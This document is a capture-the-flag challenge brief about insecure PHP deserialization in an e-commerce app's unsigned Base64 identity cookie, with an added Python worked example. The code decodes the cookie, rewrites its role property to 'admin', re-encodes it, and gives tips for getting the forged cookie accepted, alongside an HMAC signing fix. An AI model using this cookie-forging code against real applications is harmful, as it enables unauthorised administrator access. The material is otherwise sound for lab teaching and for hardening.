DesAdmin
Overview
SCENARIO
Welcome to E-commerce, a newly launched online shopping platform built rapidly to meet high demand. The application includes basic authentication and a user profile system. User identity is managed using a client-side cookie that stores serialized PHP objects, which are Base64 encoded before being sent to the browser.
However, the application passes this cookie straight to unserialize() without validating or authenticating it, so it is vulnerable to insecure deserialization. Because the cookie is only Base64 encoded, not signed, anyone can decode it, change the object's properties, re-encode it, and have the server accept the result; this is how an attacker escalates privileges with a crafted serialized payload.
OBJECTIVE
Analyze the application’s cookie handling mechanism and exploit insecure PHP object deserialization to impersonate an administrator account. Modify the serialized object structure to escalate privileges and retrieve the flag.
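The decode, tamper, re-encode cycle described above, as an added worked example that is not part of the challenge or its target application. It contains a small serializer and parser for the PHP serialize() format (the subset an identity object needs), a helper that rewrites one property of the Base64-wrapped object, and, for contrast, the HMAC check that would have stopped the attack. The class name User and the properties username and role are assumptions for illustration; the real cookie's class and property names are what you must recover with Burp Suite or the PHP CLI.

```python
"""Decode, tamper with and re-encode a Base64-wrapped PHP serialized cookie.
Added example, not the challenge's own code. The class name "User" and the
properties "username"/"role" are ASSUMPTIONS, not taken from the target."""
import base64
import hashlib
import hmac


def php_serialize(value):
    """Emit PHP serialize() syntax for None, bool, int, str, dict (PHP array)
    and (class_name, props) tuples (PHP object). String lengths are BYTE
    lengths, exactly as PHP counts them, which matters for non-ASCII names."""
    if value is None:
        return "N;"
    if isinstance(value, bool):
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    if isinstance(value, tuple) and len(value) == 2:
        cls, props = value
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in props.items())
        return f'O:{len(cls.encode())}:"{cls}":{len(props)}:{{{body}}}'
    raise TypeError(f"unsupported type {type(value).__name__}")


def _parse(data, pos):
    """Parse one value starting at data[pos]; return (value, next_pos)."""
    tag = chr(data[pos])
    if tag == "N":
        return None, pos + 2                   # "N;"
    if tag in "ib":
        end = data.index(b";", pos)
        num = int(data[pos + 2:end])
        return (bool(num) if tag == "b" else num), end + 1
    if tag == "s":                             # length-prefixed, so quotes inside are safe
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                      # skip ':"'
        return data[start:start + length].decode(), start + length + 2
    if tag == "a" or tag == "O":
        colon = data.index(b":", pos + 2)
        n = int(data[pos + 2:colon])           # element count, or class-name length for O
        pos = colon + 2
        cls = None
        if tag == "O":
            cls = data[pos:pos + n].decode()
            pos += n + 2                       # skip '":'
            colon = data.index(b":", pos)
            n = int(data[pos:colon])           # property count
            pos = colon + 2
        items = {}
        for _ in range(n):
            k, pos = _parse(data, pos)
            v, pos = _parse(data, pos)
            items[k] = v
        return (items if tag == "a" else (cls, items)), pos + 1   # skip '}'
    raise ValueError(f"unsupported tag {tag!r} at offset {pos}")


def php_unserialize(data: bytes):
    value, _ = _parse(data, 0)
    return value


def decode_cookie(cookie: str):
    return php_unserialize(base64.b64decode(cookie))


def encode_cookie(value) -> str:
    return base64.b64encode(php_serialize(value).encode()).decode()


def escalate(cookie: str, prop: str = "role", new_value: str = "admin") -> str:
    """Rewrite one property of the serialized object and re-wrap it in Base64."""
    cls, props = decode_cookie(cookie)
    props[prop] = new_value
    return encode_cookie((cls, props))


# Constructed sample: the cookie the app would issue to an ordinary user.
SAMPLE_COOKIE = encode_cookie(("User", {"username": "alice", "role": "user"}))


def sign_cookie(cookie: str, secret: bytes) -> str:
    """Hardened variant: append an HMAC so tampering is caught before
    unserialize() ever runs (the fix, not something the target does)."""
    tag = hmac.new(secret, cookie.encode(), hashlib.sha256).hexdigest()
    return f"{cookie}.{tag}"


def verify_cookie(signed: str, secret: bytes):
    """Return the decoded object, or None if the HMAC does not match."""
    cookie, _, tag = signed.rpartition(".")
    expected = hmac.new(secret, cookie.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return decode_cookie(cookie)


if __name__ == "__main__":
    print(base64.b64decode(SAMPLE_COOKIE).decode())
    print(base64.b64decode(escalate(SAMPLE_COOKIE)).decode())
```

Two things to watch when you do this against the real target: the length field of every s: and the class-name length must be byte counts, so editing the string by hand in Burp without fixing the lengths produces a cookie that unserialize() rejects; and the Base64 must be re-encoded from the exact bytes PHP expects, with no trailing newline. The sign/verify pair shows why the attack stops working once the cookie is authenticated: the tampered Base64 no longer matches its tag, and the server never reaches unserialize().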
Infrastructure: Web Application (PHP)
Provided Files: None (black-box testing)
Tools Required: Web Browser, Burp Suite, Local PHP CLI
Flag Format: Flag{...}